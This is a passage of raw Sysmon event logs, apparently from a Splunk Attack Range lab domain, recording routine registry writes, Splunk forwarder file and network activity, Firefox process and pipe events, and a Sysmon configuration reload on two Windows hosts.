AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12E26907120E5E6179D94DAE8C0E479,SHA256=0487F959E716DFE4C7B9DF4EAAB118BB6FF747ED282396844BD44FAC186DCCDE,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000808241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000808240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6588c6) 13241300x8000000000000000808239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xfb2613d5) 13241300x8000000000000000808238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x5cea7bd5) 13241300x8000000000000000808237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0xbeaee3d5) 13241300x8000000000000000808236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000808235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f6588c6) 13241300x8000000000000000808234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ea-0xfb2613d5) 13241300x8000000000000000808233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x5cea7bd5) 13241300x8000000000000000808232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:56:04.526{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0xbeaee3d5) 23542300x8000000000000000808231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:04.447{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E2F2AAC8E87CE142DEC107F14A0F787,SHA256=30AE750DE9B62A3BC6D09E915CB0986EAE4657CADD98A9063C8A0C47E25929AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:04.306{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AFD3379D9E7CA3E46299B0034D62CAA,SHA256=D3EF54E32ABCFBBB73F80CA5467040259EAEEEFA12CB0B379FEAB0F01CDA6E8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:05.306{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD13DC16F97E9180B4F22F5FF37A8794,SHA256=B4B3C07643DE6987E91006328C3BC390B247B9B8D13736E670DE4FC67284B5A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:05.463{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90804A9A47CD5D7B62AA2752DC3EEC73,SHA256=3F79AED33C246BB409CEC523AB0D590ACD4565036644B8076F77D65A677A4223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:06.479{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0AE3DA6C12AD23303F62B5593A47A83,SHA256=79A4D7933A8CBF11A25FBD05547DD4F22D3B098C795BD2B7BFF936D3BB5C35F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.321{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA8FB75B954AF228847CE8F96A871C3,SHA256=A256197B8C46C6F1C3D365448D84690032C1AB9DBC66061DB4802CDA1B46DC99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.283{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001050289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.268{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001050288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:56:06.268{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.409.183797942C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001050287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:56:06.268{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.409.183797942C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000808244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:07.494{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8224454075652966D278A415702913C,SHA256=C7EADB6007933400EE071067BE77362063521E96A0CA8B7A407D621AC9529C97,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.725{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001050293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61A73C796EE4B5B2516A9CE497D201F,SHA256=F848D9454AC097BE5D0E68A8F2A832C38BF0E3CD9D6CFBE34DBCDDCA3E962714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:07.205{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57315-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:08.494{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3206D4B318068142372D27B304709BEF,SHA256=DAC77E7377B00EB946FB2E005FB2AA90218FE49B3BFA401C092D372879EA3362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CC8841E1E0F0426AF1627B306D0CB57,SHA256=E76E153D228A14A29B67BA61FF215F07D945CC91E05D69FC5BBA46643C2C3EBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A114D5F4DC5A6ADD829A28B16DD95646,SHA256=410E7A98D69D140B6CDF9E576853EE35DBB6C5E00590C7FE253C7C327053BFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53F2F155BE50C6B649C02FAF7C6FFC1,SHA256=922051AA3C1218CF650C56E480C9E5EB3BB915F62BCBF41C7140229AF596A2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:09.494{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9F75E9B59A1AB9133930EED41D2D56E,SHA256=ADA282911088122D0A17962F6DDCBF7EDE9595C6EB4590A6CD3B8A853D1AE429,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:01.578{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51081-false10.0.1.12-8000- 23542300x80000000000000001050305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:09.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA07E426A1C4E46D425C0C90CBFF5F1,SHA256=EFE6B20B1AFCA9FDF8B28A4F549FBE3BF8B522179AC4E2BC3859D05249EBD9A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:10.510{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95E5404C57E5705AD7A338E576B99E90,SHA256=0EC9867E8BCC078B466D90D9C6E2C88A9548A00566F1F73880DD200AF0FD79F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.407{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B582E0F1437DF3E76A8A63B81E895BC6,SHA256=DB9AE191F7019A0A7E7AF7B4388436FC272BC0700F5F36F586FD206A0D12623A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:11.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2164377C452FED2BFC6F1E61746F31C6,SHA256=A84C8CF93080C7683B5C4BA78BF43CED0CCF941B8C8784E272D395A3F5E77524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:11.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CC8841E1E0F0426AF1627B306D0CB57,SHA256=E76E153D228A14A29B67BA61FF215F07D945CC91E05D69FC5BBA46643C2C3EBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:11.408{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E5408F5CC46EEF0BD68D7F166D2F878,SHA256=FC2C9B43DC43814143F6F7CC6CD084E7D026EC651C860288A869E50E3105D9E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:12.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65698F0398693154E2453CE0A30F5924,SHA256=F2EB235BFE71D0DEB419CA31A4095041A0F2DD457456A46618C46673463B357F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=406F492C6E0CAFFBDB16F946BE6F6534,SHA256=A52FD2EC8A24CBCE31F538A8699E7C5B05888039D922A7DACA389EF9E92EF911,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 